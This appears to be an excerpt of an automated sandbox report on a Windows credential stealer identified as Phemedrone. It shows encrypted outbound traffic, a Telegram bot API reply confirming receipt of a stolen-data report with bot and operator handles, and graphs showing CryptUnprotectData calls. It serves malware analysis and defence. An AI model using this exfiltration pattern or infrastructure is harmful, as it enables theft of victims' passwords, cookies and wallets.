                                                                          2024-10-30 21:57:02 UTC145OUTData Raw: 95 d2 31 13 ad 5f 53 77 85 a4 13 b1 b6 de ad 69 44 6f 03 9b 62 55 6e c7 0c b2 33 50 c1 a5 6a 7f b9 ad 8d 1c 16 d1 6f f8 34 a8 be 0b 4d cd 57 82 62 a4 28 2f bd 54 a8 53 07 f8 91 53 1a 13 47 fc f1 6e 99 16 84 50 2e e7 ec aa 15 2c a2 ee f4 19 f6 2a 13 dc ca d1 a8 b5 8b b1 67 b1 78 d8 44 5d 8c 1a 64 9a 03 c4 e0 71 1c e6 7b 81 c4 ef 7e 85 ea 27 eb 60 ce 40 6d 34 ce 53 8b 7e 7c 95 9b 0e 76 ea 8d 58 90 ac 38 a2 f9 31 42 5f 5a b1 d0 d9 7e
                                                                          Data Ascii: 1_SwiDobUn3Pjo4MWb(/TSSGnP.,*gxD]dq{~'`@m4S~|vX81B_Z~
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 38 72 d4 35 bc f3 10 5e 54 7c ad b4 88 fa 54 fb 9d 1a 08 0c bf ed 05 2b 25 8f f3 25 35 32 0d 53 16 4c a8 40 e0 3f 94 d0 2c 0b 5a aa c4 7d f0 5c 64 4e 68 ac 9f 41 13 86 77 38 db 07 e3 7c 68 d0 98 01 9d ce 9e 5a f4 5f a3 c2 2e 18 d8 fe d1 84 bd 80 6f 1b 3c 68 46 8d 74 04 73 a7 15 c2 a6 10 d8 03 ce 6b d9 c3 6a 96 9c b2 95 cc 12 c3 e5 e8 66 6d e3 55 23 f8 de dd 27 da ab 17 74 47 b2 5f a1 cf 3b 5d b8 a8 ec 4a 01 4c 95 c9 5d 9e 22 cb bf 80 fe b9 5e b3 94 fb a5 d4 cb 99 1e 37 10 1d 42 89 85 ec 2a d2 0d 72 a2 c1 77 a6 c6 df 5b bf d2 2c 3c 1c 17 5d 30 0e 70 80 24 2b 63 ec 9f e5 9a ae 78 01 42 c2 19 5d 98 5f 83 09 08 3d 85 ef 8f 63 90 c8 af 0d 47 7f e8 90 bd c6 fa d9 3e d2 25 7b 2e d7 91 e8 47 8b eb 7d b4 ac f2 9f 93 da 67 e0 4e 13 a5 7d 42 2c 72 27 51 36 fa 33 43
                                                                          Data Ascii: 8r5^T|T+%%52SL@?,Z}\dNhAw8|hZ_.o<hFtskjfmU#'tG_;]JL]"^7B*rw[,<]0p$+cxB]_=cG>%{.G}gN}B,r'Q63C
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 73 c3 45 58 25 94 26 a6 28 70 c6 48 56 c6 12 46 00 41 a1 d1 ee 03 dc 2e f7 7a 50 27 38 02 38 83 3f 2e 02 b2 01 90 d4 dc 7c 8f 98 de 3a 07 1e 1d 73 6d 46 81 a6 47 41 0b 6a 63 f0 37 d6 fb c5 73 34 ed 51 bd df e5 3e dc 77 37 cf 8b 37 66 a7 7d a8 cf a1 a0 e4 f5 35 98 f7 be ca 38 ba 42 c3 3f 44 83 27 b9 37 c6 ce b0 cc 15 37 f4 cc 32 cd d2 1b bd 06 ce e9 4d 4e 0f 15 d5 83 c6 36 ea 4a 8c 32 38 80 ff 51 cb 25 68 a6 9f e2 b3 b2 6c 5d 88 91 c0 1f 6a 46 68 01 b0 7e cc 5e bf 46 4c 69 90 9a 26 d0 3e 8c 04 f3 4a fd f8 df 11 e2 44 ac 16 1d 8c ed ea ca 38 f2 2c 5d 24 e8 a5 13 08 0e 2f 94 1c 06 65 b7 cd bb a3 e1 6e 66 12 77 95 6d 91 ae 99 78 80 bc 89 6d b3 7d ea fb f8 34 a4 9d ab f3 38 7d 11 2a 7e 9f 4b d6 35 87 3e fe bb 00 fc 26 6a ca 6f de fc 40 b5 5c a8 66 69 25 23 be
                                                                          Data Ascii: sEX%&(pHVFA.zP'88?.|:smFGAjc7s4Q>w77f}58B?D'772MN6J28Q%hl]jFh~^FLi&>JD8,]$/enfwmxm}48}*~K5>&jo@\fi%#
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 26 d7 35 9c f5 eb 9e 8b ac 8e fe d6 0d 65 30 27 dd 04 b2 44 c9 15 7e 76 38 9e 96 7e 3b ec 17 ea 59 3c 9b 56 ea 8a fc a5 3d 87 ff 39 2c a3 62 bd 47 3e cd 2b 07 d8 09 e5 07 d6 29 30 0f af bb f3 41 2c dc c2 97 8f 89 41 34 44 07 e5 51 12 c8 44 08 a9 78 0b 95 42 74 b7 4c 9d 46 36 d2 ae c2 33 d6 d3 84 23 23 74 0d 44 4f 4f 8f a0 d8 fc 46 3d 96 a6 a1 27 10 13 6e 15 26 0a 76 36 9b 03 ab 81 b2 eb 38 38 68 60 59 2a a0 11 b9 ae 4d dd ee c5 91 9c fc 16 ed 45 41 bb 06 b7 97 86 3e 80 42 80 1f 57 c3 51 7f 97 bc 14 97 0c 9b b1 6b 1c eb f6 f7 8e f7 82 76 3c 32 ca 4a 9d 13 70 3d 0f 90 f4 9d c5 44 57 d2 b8 45 22 7e a5 07 fd 0c e5 52 78 1e 9d f4 87 e2 87 be f3 c7 84 13 79 a7 11 e2 84 c7 3f 8c 9c bb d6 23 1f 1f 20 9a a5 de c6 2f 3d ed 40 a8 e2 60 ee ea 3c 76 9d 33 66 51 06 b3
                                                                          Data Ascii: &5e0'D~v8~;Y<V=9,bG>+)0A,A4DQDxBtLF63##tDOOF='n&v688h`Y*MEA>BWQkv<2Jp=DWE"~Rxy?# /=@`<v3fQ
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 19 cb c4 1c 8a 78 e2 d3 bb 4a 32 80 63 e2 64 2a 9c 2f 29 b1 86 5c 8f 2d 60 da c7 8b 87 5c bb 71 76 8b a4 92 3f 33 58 bc b4 06 f4 08 7b 2d 1a 55 1f f4 0b 90 dc 4b 9e 55 e4 42 57 27 9f 35 b0 d0 44 bd e7 ef ca 82 21 67 99 95 71 53 bb ae 3e d7 86 9d 3a 3e eb 9d d2 a5 9c 19 35 36 b8 dd b7 51 5e c2 0a 6c 43 19 d0 0a 18 73 e1 0c 17 06 de 44 56 78 4a 8e 3b 15 ac a6 ec 53 d7 4f 59 05 11 a5 db a5 dc e0 72 d8 7e 8d 91 41 46 34 e7 40 46 2c 33 bf 51 ca e1 1f 6d e2 97 e3 77 0c e2 6b 2a ef e1 9b 77 1e e3 50 e2 d9 d3 2a d3 5e 60 8f 78 38 b7 55 bf fd a1 e8 62 24 dd c0 7e 06 1c b9 0e fa 1a 08 07 79 0f 38 cf 0a 0a b9 9c 74 65 ac b8 ce 94 5f d7 91 c3 1f ba 58 dc 43 91 b3 a9 08 5a df 01 cc 2a ea 0e b4 c4 1d 18 b1 35 6b 26 70 51 73 9e b3 81 cf 84 26 82 db 6d 5e c7 d8 3e f9 cb
                                                                          Data Ascii: xJ2cd*/)\-`\qv?3X{-UKUBW'5D!gqS>:>56Q^lCsDVxJ;SOYr~AF4@F,3Qmwk*wP*^`x8Ub$~y8te_XCZ*5k&pQs&m^>
2024-10-30 21:57:03 UTC | 1287 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Wed, 30 Oct 2024 21:57:03 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 899
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          {"ok":true,"result":{"message_id":149359,"from":{"id":6217988193,"is_bot":true,"first_name":"mu9rk","username":"murk09_bot"},"chat":{"id":6065194468,"first_name":"Jacklin","last_name":"Smith","username":"richoffcrime","type":"private"},"date":1730325423,"document":{"file_name":"[US]173.254.250.78-Phemedrone-Report.phem","file_id":"BQACAgEAAxkDAAECR29nIquvCuQ3GKlJq5FFSWp5YloFJwACrAYAAq_DGEVxuNRmh7EGmjYE","file_unique_id":"AgADrAYAAq_DGEU","file_size":721824},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 173.254.250.78 (United States)\n - Tag: Default (Pekemum)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot","caption_entities":[{"offset":0,"length":25,"type":"bold"},{"offset":31,"length":11,"type":"mention"},{"offset":45,"length":8,"type":"mention"},{"offset":55,"length":108,"type":"pre"},{"offset":167,"length":16,"type":"mention"}]}}



Target ID: 0
Start time: 17:56:52
Start date: 30/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x1e393020000
File size: 141'824 bytes
MD5 hash: CAE3F7AE06655EB93F5DFB028DDD3D6D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.3890665414.000001E394D0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false


                                                                            Execution Graph

                                                                            Execution Coverage:15.7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:9.7%
                                                                            Total number of Nodes:31
                                                                            Total number of Limit Nodes:1
execution_graph (nodes: id address [API]; edges: id->id)
14225 7ff848ea3e02
14227 7ff848ea3e11 CryptUnprotectData
14225->14227
14228 7ff848ea3fd9
14227->14228
14229 7ff848ea377c
14230 7ff848ea3783
14229->14230
14233 7ff848e9f600
14230->14233
14232 7ff848ea3788
14234 7ff848ea3920
14233->14234
14235 7ff848e97aa0 LoadLibraryA
14234->14235
14236 7ff848ea3939
14235->14236
14237 7ff848ea393e
14236->14237
14240 7ff848ea3988 LoadLibraryA
14236->14240
14238 7ff848e97ab0 LoadLibraryA
14237->14238
14239 7ff848ea3949
14238->14239
14239->14232
14242 7ff848ea3b1f
14240->14242
14242->14232
14204 7ff848ea9bdd
14207 7ff848ea3920
14204->14207
14206 7ff848ea9be2
14216 7ff848e97aa0
14207->14216
14209 7ff848ea3939
14210 7ff848ea393e
14209->14210
14213 7ff848ea3988 LoadLibraryA
14209->14213
14220 7ff848e97ab0
14210->14220
14212 7ff848ea3949
14212->14206
14215 7ff848ea3b1f
14213->14215
14215->14206
14217 7ff848e97aa7 LoadLibraryA
14216->14217
14219 7ff848ea3b1f
14217->14219
14219->14209
14222 7ff848e97aaa
14220->14222
14221 7ff848e97ade
14221->14212
14222->14221
14223 7ff848ea3acb LoadLibraryA
14222->14223
14224 7ff848ea3b1f
14223->14224
14224->14212
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0vH
                                                                            • API String ID: 0-2857910901
                                                                            • Opcode ID: ae322cd72d38721ad5484160f09a3d762262f82c0b170be43f2155d0a094f29d
                                                                            • Instruction ID: 6f50e8b5b41e62e6da4779f5d9920604fee092ef2cb3e6e4a3783cda5f4c61c3
                                                                            • Opcode Fuzzy Hash: ae322cd72d38721ad5484160f09a3d762262f82c0b170be43f2155d0a094f29d
                                                                            • Instruction Fuzzy Hash: 16D2B130A1CA4A8FE748AB68845577673D2FF95388F6400BDC54EC72D3DFB9A8428749

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
control_flow_graph (blocks: id start-end [API]; edges: id->id)
1381 7ff848ea3e02-7ff848ea3e0f
1382 7ff848ea3e11-7ff848ea3e19
1381->1382
1383 7ff848ea3e1a-7ff848ea3e2b
1381->1383
1382->1383
1384 7ff848ea3e36-7ff848ea3e65
1383->1384
1385 7ff848ea3e2d-7ff848ea3e35
1383->1385
1387 7ff848ea3e67-7ff848ea3eae
1384->1387
1388 7ff848ea3eaf-7ff848ea3f1b
1384->1388
1385->1384
1387->1388
1392 7ff848ea3f1d-7ff848ea3f21
1388->1392
1393 7ff848ea3f8c-7ff848ea3fd7 CryptUnprotectData
1388->1393
1394 7ff848ea3f70-7ff848ea3f8b
1392->1394
1395 7ff848ea3f23-7ff848ea3f6a
1392->1395
1396 7ff848ea3fd9
1393->1396
1397 7ff848ea3fdf-7ff848ea401d
1393->1397
1394->1393
1395->1394
1396->1397
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CryptDataUnprotect
                                                                            • String ID:
                                                                            • API String ID: 834300711-0
                                                                            • Opcode ID: 1d7168910f16696e2ca11777a12d99803a3543e073de19eea3cd05e2f60d467b
                                                                            • Instruction ID: f70bdcf81f15be19872bcf41a6b6578bd4562b1639c2d2728bfc9794fe482b30
                                                                            • Opcode Fuzzy Hash: 1d7168910f16696e2ca11777a12d99803a3543e073de19eea3cd05e2f60d467b
                                                                            • Instruction Fuzzy Hash: 2F619F3090CA498FDB99EB18D845BE9B7F1FF55710F0442AAD40DD3292DF7469858B81
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6929e6a6114920dfbe1ac30a22dbc7cef6dea5e96206d835f47c2da65b7cc698
                                                                            • Instruction ID: c12d1fda809e0c92d6c66ecf2f9cc8dd34c94bf52c7d8dcd5527b24eeedf4d6a
                                                                            • Opcode Fuzzy Hash: 6929e6a6114920dfbe1ac30a22dbc7cef6dea5e96206d835f47c2da65b7cc698
                                                                            • Instruction Fuzzy Hash: 9B926D34A0CA4A8FDF98EF28C495AA93BE1FF59740F1405B9E44EC7292CB35E845CB54
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6bc4dcec889f5c1c20e2dc54bc987653d8c7d4aff75e4ad3bccb367ab0c6f89c
                                                                            • Instruction ID: dd875261da15982adada100c3ae1a293c1969a3f1ee3496dff313e9ff8196f6d
                                                                            • Opcode Fuzzy Hash: 6bc4dcec889f5c1c20e2dc54bc987653d8c7d4aff75e4ad3bccb367ab0c6f89c
                                                                            • Instruction Fuzzy Hash: 2582F660B2DA495FE34CB7684829A75BBD1FF99784F5404FED04EC72D3DE28A805831A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dbd7cbec6fd8ab31cf44dd7ca68c21447ccfed062848f99911fb0f72f9733e05
                                                                            • Instruction ID: ae075ddfae562a0d9c2ee1bddcd7eb010f50f8ab7303360406dab70f2abed5a1
                                                                            • Opcode Fuzzy Hash: dbd7cbec6fd8ab31cf44dd7ca68c21447ccfed062848f99911fb0f72f9733e05
                                                                            • Instruction Fuzzy Hash: 95722221B1DA8A5FE389FB6844156797BD2FF99388F0401BED04EC72D7DE38A8058356
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:

                                                                            Control-flow Graph (graph rendering omitted): entry block 7ff848e97aa0-7ff848ea3a5f; block 7ff848ea3aba-7ff848ea3b1d calls LoadLibraryA; block 7ff848ea3b25-7ff848ea3b61 calls the local function at 7ff848ea3b7d. Legend: Executed / Not Executed.
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:

                                                                            Control-flow Graph (graph rendering omitted): entry block 7ff848ea3996-7ff848ea3a5f; block 7ff848ea3aba-7ff848ea3b1d calls LoadLibraryA; block 7ff848ea3b25-7ff848ea3b61 calls the local function at 7ff848ea3b7d. Legend: Executed / Not Executed.
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0